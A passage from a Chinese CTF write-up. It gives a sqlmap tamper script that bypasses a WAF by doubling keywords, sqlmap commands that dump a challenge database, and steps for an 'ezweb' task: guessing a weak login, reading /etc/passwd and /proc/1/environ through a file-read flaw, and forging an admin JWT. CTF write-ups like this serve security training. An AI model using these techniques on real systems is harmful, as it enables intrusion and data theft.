</h5><p>​	这里需要绕过空格和双写，双写需要自己去找脚本，这里我贴上，然后双写的字典需要自己修改，改一下keywords就好，这里只有select被waf，只填select就行。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span><span class="lnt">42
</span><span class="lnt">43
</span><span class="lnt">44
</span><span class="lnt">45
</span><span class="lnt">46
</span><span class="lnt">47
</span><span class="lnt">48
</span><span class="lnt">49
</span><span class="lnt">50
</span><span class="lnt">51
</span><span class="lnt">52
</span><span class="lnt">53
</span><span class="lnt">54
</span><span class="lnt">55
</span><span class="lnt">56
</span><span class="lnt">57
</span><span class="lnt">58
</span><span class="lnt">59
</span><span class="lnt">60
</span><span class="lnt">61
</span><span class="lnt">62
</span><span class="lnt">63
</span><span class="lnt">64
</span><span class="lnt">65
</span><span class="lnt">66
</span><span class="lnt">67
</span><span class="lnt">68
</span><span class="lnt">69
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="c1">#!/usr/bin/env python</span>
</span></span><span class="line"><span class="cl"><span class="c1"># -*- coding: utf-8 -*-</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">Copyright (c) 2006-2022 sqlmap developers (http://sqlmap.org/)
</span></span></span><span class="line"><span class="cl"><span class="s2">See the file &#39;doc/COPYING&#39; for copying permission
</span></span></span><span class="line"><span class="cl"><span class="s2">&#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">import</span> <span class="n">re</span>
</span></span><span class="line"><span class="cl"><span class="n">from</span> <span class="n">lib</span><span class="o">.</span><span class="n">core</span><span class="o">.</span><span class="n">common</span> <span class="n">import</span> <span class="n">singleTimeWarnMessage</span>
</span></span><span class="line"><span class="cl"><span class="n">from</span> <span class="n">lib</span><span class="o">.</span><span class="n">core</span><span class="o">.</span><span class="n">enums</span> <span class="n">import</span> <span class="n">PRIORITY</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">__priority__</span> <span class="o">=</span> <span class="n">PRIORITY</span><span class="o">.</span><span class="n">NORMAL</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">tamper</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">   	&#34;ABORT&#34;, &#34;ACTION&#34;, &#34;ADD&#34;, &#34;AFTER&#34;, &#34;ALL&#34;, &#34;ALTER&#34;, &#34;ALWAYS&#34;, &#34;ANALYZE&#34;, &#34;AND&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;AS&#34;, &#34;ASC&#34;, &#34;ATTACH&#34;, &#34;AUTOINCREMENT&#34;, &#34;BEFORE&#34;, &#34;BEGIN&#34;, &#34;BETWEEN&#34;, &#34;CASCADE&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;CASE&#34;, &#34;CAST&#34;, &#34;CHECK&#34;, &#34;COLLATE&#34;, &#34;COLUMN&#34;, &#34;COMMIT&#34;, &#34;CONFLICT&#34;, &#34;CONSTRAINT&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;CREATE&#34;, &#34;CROSS&#34;, &#34;CURRENT&#34;, &#34;CURRENT_DATE&#34;, &#34;CURRENT_TIME&#34;, &#34;CURRENT_TIMESTAMP&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;DATABASE&#34;, &#34;DEFAULT&#34;, &#34;DEFERRABLE&#34;, &#34;DEFERRED&#34;, &#34;DELETE&#34;, &#34;DESC&#34;, &#34;DETACH&#34;, &#34;DISTINCT&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;DO&#34;, &#34;DROP&#34;, &#34;EACH&#34;, &#34;ELSE&#34;, &#34;END&#34;, &#34;ESCAPE&#34;, &#34;EXCEPT&#34;, &#34;EXCLUDE&#34;, &#34;EXCLUSIVE&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;EXISTS&#34;, &#34;EXPLAIN&#34;, &#34;FAIL&#34;, &#34;FILTER&#34;, &#34;FIRST&#34;, &#34;FOLLOWING&#34;, &#34;FOR&#34;, &#34;FOREIGN&#34;, &#34;FROM&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;FULL&#34;, &#34;GENERATED&#34;, &#34;GLOB&#34;, &#34;GROUP&#34;, &#34;GROUPS&#34;, &#34;HAVING&#34;, &#34;IF&#34;, &#34;IGNORE&#34;, &#34;IMMEDIATE&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;INDEX&#34;, &#34;INDEXED&#34;, &#34;INITIALLY&#34;, &#34;INNER&#34;, &#34;INSERT&#34;, &#34;INSTEAD&#34;, &#34;INTERSECT&#34;, &#34;INTO&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;IS&#34;, &#34;ISNULL&#34;, &#34;JOIN&#34;, &#34;KEY&#34;, &#34;LAST&#34;, &#34;LEFT&#34;, &#34;LIKE&#34;, &#34;LIMIT&#34;, &#34;MATCH&#34;, &#34;MATERIALIZED&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;NATURAL&#34;, &#34;NO&#34;, &#34;NOT&#34;, &#34;NOTHING&#34;, &#34;NOTNULL&#34;, &#34;NULL&#34;, &#34;NULLS&#34;, &#34;OF&#34;, &#34;OFFSET&#34;, &#34;ON&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;OR&#34;, &#34;ORDER&#34;, &#34;OTHERS&#34;, &#34;OUTER&#34;, &#34;OVER&#34;, &#34;PARTITION&#34;, &#34;PLAN&#34;, &#34;PRAGMA&#34;, &#34;PRECEDING&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;PRIMARY&#34;, &#34;QUERY&#34;, &#34;RAISE&#34;, &#34;RANGE&#34;, &#34;RECURSIVE&#34;, &#34;REFERENCES&#34;, &#34;REGEXP&#34;, &#34;REINDEX&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;RELEASE&#34;, &#34;RENAME&#34;, &#34;REPLACE&#34;, &#34;RESTRICT&#34;, &#34;RETURNING&#34;, &#34;RIGHT&#34;, &#34;ROLLBACK&#34;, &#34;ROW&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;ROWS&#34;, &#34;SAVEPOINT&#34;, &#34;SET&#34;, &#34;TABLE&#34;, &#34;TEMP&#34;, &#34;TEMPORARY&#34;, &#34;THEN&#34;, &#34;TIES&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;TO&#34;, &#34;TRANSACTION&#34;, &#34;TRIGGER&#34;, &#34;UNBOUNDED&#34;, &#34;UNION&#34;, &#34;UNIQUE&#34;, &#34;UPDATE&#34;, &#34;USING&#34;,
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;VACUUM&#34;, &#34;VALUES&#34;, &#34;VIEW&#34;, &#34;VIRTUAL&#34;, &#34;WHEN&#34;, &#34;WHERE&#34;, &#34;WINDOW&#34;, &#34;WITH&#34;, &#34;WITHOUT&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">    优化的双写绕过，顺序插入并判断是否新组成过滤单词。
</span></span></span><span class="line"><span class="cl"><span class="s2">    例如：SELECT 插入位置为 3 时为 SELSELECTECT，会生成黑名单中的 ELSE 导致误判。
</span></span></span><span class="line"><span class="cl"><span class="s2">    此处通过检查确保生成的字符串不包含其他敏感词。
</span></span></span><span class="line"><span class="cl"><span class="s2">
</span></span></span><span class="line"><span class="cl"><span class="s2">    示例:
</span></span></span><span class="line"><span class="cl"><span class="s2">    &gt;&gt;&gt; tamper(&#39;select 1 or 2 ORDER&#39;)
</span></span></span><span class="line"><span class="cl"><span class="s2">    &#39;selorect 1 oorr 2 OorRDER&#39;
</span></span></span><span class="line"><span class="cl"><span class="s2">    &#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">keywords</span> <span class="o">=</span> <span class="p">[</span>
</span></span><span class="line"><span class="cl">        <span class="s2">&#34;SELECT&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="p">]</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">retVal</span> <span class="o">=</span> <span class="n">payload</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">warnMsg</span> <span class="o">=</span> <span class="s2">&#34;当前关键字列表如下，请注意修改:</span><span class="se">\n</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">warnMsg</span> <span class="o">+=</span> <span class="s2">&#34;</span><span class="si">%s</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">keywords</span>
</span></span><span class="line"><span class="cl">    <span class="n">singleTimeWarnMessage</span><span class="p">(</span><span class="n">warnMsg</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">payload</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">reversed</span><span class="p">(</span><span class="n">keywords</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">            <span class="n">index</span> <span class="o">=</span> <span class="n">keywords</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="n">key</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="n">num</span> <span class="o">=</span> <span class="mi">1</span>
</span></span><span class="line"><span class="cl">            <span class="n">check</span> <span class="o">=</span> <span class="n">True</span>
</span></span><span class="line"><span class="cl">            <span class="k">while</span> <span class="n">check</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">                <span class="k">if</span> <span class="n">num</span> <span class="o">&gt;=</span> <span class="n">len</span><span class="p">(</span><span class="n">key</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">                    <span class="n">singleTimeWarnMessage</span><span class="p">(</span><span class="s1">&#39;无法绕过双写关键字列表&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                    <span class="k">return</span> <span class="n">retVal</span>
</span></span><span class="line"><span class="cl">                <span class="n">check</span> <span class="o">=</span> <span class="n">False</span>
</span></span><span class="line"><span class="cl">                <span class="n">repStr</span> <span class="o">=</span> <span class="s2">&#34;</span><span class="si">%s%s%s</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="p">(</span><span class="n">key</span><span class="p">[:</span><span class="n">num</span><span class="p">],</span> <span class="n">key</span><span class="p">,</span> <span class="n">key</span><span class="p">[</span><span class="n">num</span><span class="p">:])</span>
</span></span><span class="line"><span class="cl">                <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">keywords</span><span class="p">[:</span><span class="n">index</span><span class="p">]:</span>
</span></span><span class="line"><span class="cl">                    <span class="k">if</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">repStr</span><span class="p">)</span> <span class="ow">and</span> <span class="ow">not</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">                        <span class="n">check</span> <span class="o">=</span> <span class="n">True</span>
</span></span><span class="line"><span class="cl">                        <span class="k">break</span>
</span></span><span class="line"><span class="cl">                <span class="n">num</span> <span class="o">+=</span> <span class="mi">1</span>
</span></span><span class="line"><span class="cl">            <span class="n">retVal</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">sub</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">repStr</span><span class="p">,</span> <span class="n">retVal</span><span class="p">,</span> <span class="n">flags</span><span class="o">=</span><span class="n">re</span><span class="o">.</span><span class="n">I</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">retVal</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>​	然后是pyload，&ndash;tamper 后接的是sqlmap带的绕过脚本</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">python sqlmap.py -u &#34;http://27.25.151.26:31596/?id=1&#34; -p id --random-agent --fresh-queries --no-cast --dbs --tamper &#39;space2comment.py&#39; --tamper &#39;doublewrite.py&#39;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527100418631.png"
	width="1004"
	height="566"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527100418631_hu6901074818314832477.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527100418631_hu8683669238260924222.png 1024w"
	loading="lazy"
	
		alt="image-20250527100418631"
	
	
		class="gallery-image" 
		data-flex-grow="177"
		data-flex-basis="425px"
	
></p>
<p>​	查表</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">python sqlmap.py -u &#34;http://27.25.151.26:31596/?id=1&#34; -p id --random-agent --fresh-queries --no-cast -D xuanyuanCTF --tables --tamper &#39;space2comment.py&#39; --tamper &#39;doublewrite.py&#39;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527101949091.png"
	width="1009"
	height="413"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527101949091_hu14610055393821200973.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527101949091_hu2971632638139800866.png 1024w"
	loading="lazy"
	
		alt="image-20250527101949091"
	
	
		class="gallery-image" 
		data-flex-grow="244"
		data-flex-basis="586px"
	
></p>
<p>​	查列</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">python sqlmap.py -u &#34;http://27.25.151.26:31596/?id=1&#34; -p id --random-agent --fresh-queries --no-cast -D xuanyuanCTF -T info --columns --tamper &#39;space2comment.py&#39; --tamper &#39;doublewrite.py&#39;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527102752014.png"
	width="913"
	height="564"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527102752014_hu4256979269905492264.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527102752014_hu3932344414421251.png 1024w"
	loading="lazy"
	
		alt="image-20250527102752014"
	
	
		class="gallery-image" 
		data-flex-grow="161"
		data-flex-basis="388px"
	
></p>
<p>​	查数据</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">python sqlmap.py -u &#34;http://27.25.151.26:31596/?id=1&#34; -p id --random-agent --fresh-queries --no-cast -D xuanyuanCTF -T info -C content --dump --tamper &#39;space2comment.py&#39; --tamper &#39;doublewrite.py&#39;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527102617638.png"
	width="1157"
	height="525"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527102617638_hu9998519385517454084.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527102617638_hu9478764234857417343.png 1024w"
	loading="lazy"
	
		alt="image-20250527102617638"
	
	
		class="gallery-image" 
		data-flex-grow="220"
		data-flex-basis="528px"
	
></p>
<h3 id="ezweb">ezweb
</h3><h4 id="知识点弱密码文件读取环境源码都读读jwt伪造条件竞争ssti">知识点：弱密码、文件读取（环境源码都读读）、JWT伪造、条件竞争、ssti
</h4><p>​	源代码发现提示，猜测密码为123456789，用户名fly33</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527104231516.png"
	width="1312"
	height="921"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527104231516_hu10120858642733481113.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250527104231516_hu12424719379421142834.png 1024w"
	loading="lazy"
	
		alt="image-20250527104231516"
	
	
		class="gallery-image" 
		data-flex-grow="142"
		data-flex-basis="341px"
	
></p>
<p>​	进入图书预览，有三本书一个中间人攻击，一个条件竞争，一个jwt，最下方又图书上传，提示说需要管理员身份才能传，所以大体思路就出来了，伪造jwt获取管理员身份，然后文件上传。</p>
<p>​	现在问题是jwt的密钥在哪？</p>
<p>​	我们看到文件上传这段源代码，可以知道book_path这个参数可以进行文件读取</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528102442042.png"
	width="772"
	height="112"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528102442042_hu1973908790700243561.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528102442042_hu7091346223366119526.png 1024w"
	loading="lazy"
	
		alt="image-20250528102442042"
	
	
		class="gallery-image" 
		data-flex-grow="689"
		data-flex-basis="1654px"
	
></p>
<p>​	<img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528101002251.png"
	width="1122"
	height="269"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528101002251_hu10214887139858298953.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528101002251_hu14307780712455714644.png 1024w"
	loading="lazy"
	
		alt="image-20250528101002251"
	
	
		class="gallery-image" 
		data-flex-grow="417"
		data-flex-basis="1001px"
	
></p>
<p>​	尝试读取/etc/passwd</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528102931527.png"
	width="1873"
	height="984"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528102931527_hu12328933859743696089.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528102931527_hu5989090560468879553.png 1024w"
	loading="lazy"
	
		alt="image-20250528102931527"
	
	
		class="gallery-image" 
		data-flex-grow="190"
		data-flex-basis="456px"
	
></p>
<p>​	读取JWT密钥</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528185612226.png"
	width="1373"
	height="842"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528185612226_hu17405421171344567512.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528185612226_hu4056466994156690068.png 1024w"
	loading="lazy"
	
		alt="image-20250528185612226"
	
	
		class="gallery-image" 
		data-flex-grow="163"
		data-flex-basis="391px"
	
></p>
<p>​	这里有个非预期解，读/proc/1/environ可以直接读到flag，感觉没啥用处</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Linux 中的 /proc/1/environ 文件包含 PID 为 1 的进程的环境变量，该进程通常是 init 进程。这些变量由 null 字符分隔，并且该文件反映进程启动时的环境。
</span></span></code></pre></td></tr></table>
</div>
</div><p>​	得到key之后尝试伪造Jwt</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528192538804.png"
	width="1665"
	height="825"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528192538804_hu8095579293563262278.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528192538804_hu13185903248077128688.png 1024w"
	loading="lazy"
	
		alt="image-20250528192538804"
	
	
		class="gallery-image" 
		data-flex-grow="201"
		data-flex-basis="484px"
	
></p>
<p>​	然后就是文件上传。发现有ssti的内容，这里还是回头读一下源码，看看能不能打白盒</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528192908546.png"
	width="1749"
	height="709"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528192908546_hu7540460167811898732.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528192908546_hu9466500950623372154.png 1024w"
	loading="lazy"
	
		alt="image-20250528192908546"
	
	
		class="gallery-image" 
		data-flex-grow="246"
		data-flex-basis="592px"
	
></p>
<p>​	/app/app.py得到源码</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528193308065.png"
	width="2069"
	height="910"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528193308065_hu12406911258450917278.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528193308065_hu11280222653801499082.png 1024w"
	loading="lazy"
	
		alt="image-20250528193308065"
	
	
		class="gallery-image" 
		data-flex-grow="227"
		data-flex-basis="545px"
	
></p>
<p>​</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">  1
</span><span class="lnt">  2
</span><span class="lnt">  3
</span><span class="lnt">  4
</span><span class="lnt">  5
</span><span class="lnt">  6
</span><span class="lnt">  7
</span><span class="lnt">  8
</span><span class="lnt">  9
</span><span class="lnt"> 10
</span><span class="lnt"> 11
</span><span class="lnt"> 12
</span><span class="lnt"> 13
</span><span class="lnt"> 14
</span><span class="lnt"> 15
</span><span class="lnt"> 16
</span><span class="lnt"> 17
</span><span class="lnt"> 18
</span><span class="lnt"> 19
</span><span class="lnt"> 20
</span><span class="lnt"> 21
</span><span class="lnt"> 22
</span><span class="lnt"> 23
</span><span class="lnt"> 24
</span><span class="lnt"> 25
</span><span class="lnt"> 26
</span><span class="lnt"> 27
</span><span class="lnt"> 28
</span><span class="lnt"> 29
</span><span class="lnt"> 30
</span><span class="lnt"> 31
</span><span class="lnt"> 32
</span><span class="lnt"> 33
</span><span class="lnt"> 34
</span><span class="lnt"> 35
</span><span class="lnt"> 36
</span><span class="lnt"> 37
</span><span class="lnt"> 38
</span><span class="lnt"> 39
</span><span class="lnt"> 40
</span><span class="lnt"> 41
</span><span class="lnt"> 42
</span><span class="lnt"> 43
</span><span class="lnt"> 44
</span><span class="lnt"> 45
</span><span class="lnt"> 46
</span><span class="lnt"> 47
</span><span class="lnt"> 48
</span><span class="lnt"> 49
</span><span class="lnt"> 50
</span><span class="lnt"> 51
</span><span class="lnt"> 52
</span><span class="lnt"> 53
</span><span class="lnt"> 54
</span><span class="lnt"> 55
</span><span class="lnt"> 56
</span><span class="lnt"> 57
</span><span class="lnt"> 58
</span><span class="lnt"> 59
</span><span class="lnt"> 60
</span><span class="lnt"> 61
</span><span class="lnt"> 62
</span><span class="lnt"> 63
</span><span class="lnt"> 64
</span><span class="lnt"> 65
</span><span class="lnt"> 66
</span><span class="lnt"> 67
</span><span class="lnt"> 68
</span><span class="lnt"> 69
</span><span class="lnt"> 70
</span><span class="lnt"> 71
</span><span class="lnt"> 72
</span><span class="lnt"> 73
</span><span class="lnt"> 74
</span><span class="lnt"> 75
</span><span class="lnt"> 76
</span><span class="lnt"> 77
</span><span class="lnt"> 78
</span><span class="lnt"> 79
</span><span class="lnt"> 80
</span><span class="lnt"> 81
</span><span class="lnt"> 82
</span><span class="lnt"> 83
</span><span class="lnt"> 84
</span><span class="lnt"> 85
</span><span class="lnt"> 86
</span><span class="lnt"> 87
</span><span class="lnt"> 88
</span><span class="lnt"> 89
</span><span class="lnt"> 90
</span><span class="lnt"> 91
</span><span class="lnt"> 92
</span><span class="lnt"> 93
</span><span class="lnt"> 94
</span><span class="lnt"> 95
</span><span class="lnt"> 96
</span><span class="lnt"> 97
</span><span class="lnt"> 98
</span><span class="lnt"> 99
</span><span class="lnt">100
</span><span class="lnt">101
</span><span class="lnt">102
</span><span class="lnt">103
</span><span class="lnt">104
</span><span class="lnt">105
</span><span class="lnt">106
</span><span class="lnt">107
</span><span class="lnt">108
</span><span class="lnt">109
</span><span class="lnt">110
</span><span class="lnt">111
</span><span class="lnt">112
</span><span class="lnt">113
</span><span class="lnt">114
</span><span class="lnt">115
</span><span class="lnt">116
</span><span class="lnt">117
</span><span class="lnt">118
</span><span class="lnt">119
</span><span class="lnt">120
</span><span class="lnt">121
</span><span class="lnt">122
</span><span class="lnt">123
</span><span class="lnt">124
</span><span class="lnt">125
</span><span class="lnt">126
</span><span class="lnt">127
</span><span class="lnt">128
</span><span class="lnt">129
</span><span class="lnt">130
</span><span class="lnt">131
</span><span class="lnt">132
</span><span class="lnt">133
</span><span class="lnt">134
</span><span class="lnt">135
</span><span class="lnt">136
</span><span class="lnt">137
</span><span class="lnt">138
</span><span class="lnt">139
</span><span class="lnt">140
</span><span class="lnt">141
</span><span class="lnt">142
</span><span class="lnt">143
</span><span class="lnt">144
</span><span class="lnt">145
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">render_template</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">url_for</span><span class="p">,</span> <span class="n">make_response</span><span class="p">,</span> <span class="n">jsonify</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">re</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">jwt</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">app</span> <span class="o">=</span> <span class="n">Flask</span><span class="p">(</span><span class="vm">__name__</span><span class="p">,</span> <span class="n">template_folder</span><span class="o">=</span><span class="s1">&#39;templates&#39;</span><span class="p">)</span>  <span class="c1"># 创建 Flask 应用并指定模板文件夹</span>
</span></span><span class="line"><span class="cl"><span class="n">app</span><span class="o">.</span><span class="n">config</span><span class="p">[</span><span class="s1">&#39;TEMPLATES_AUTO_RELOAD&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="kc">True</span>  <span class="c1"># 启用模板自动重载功能</span>
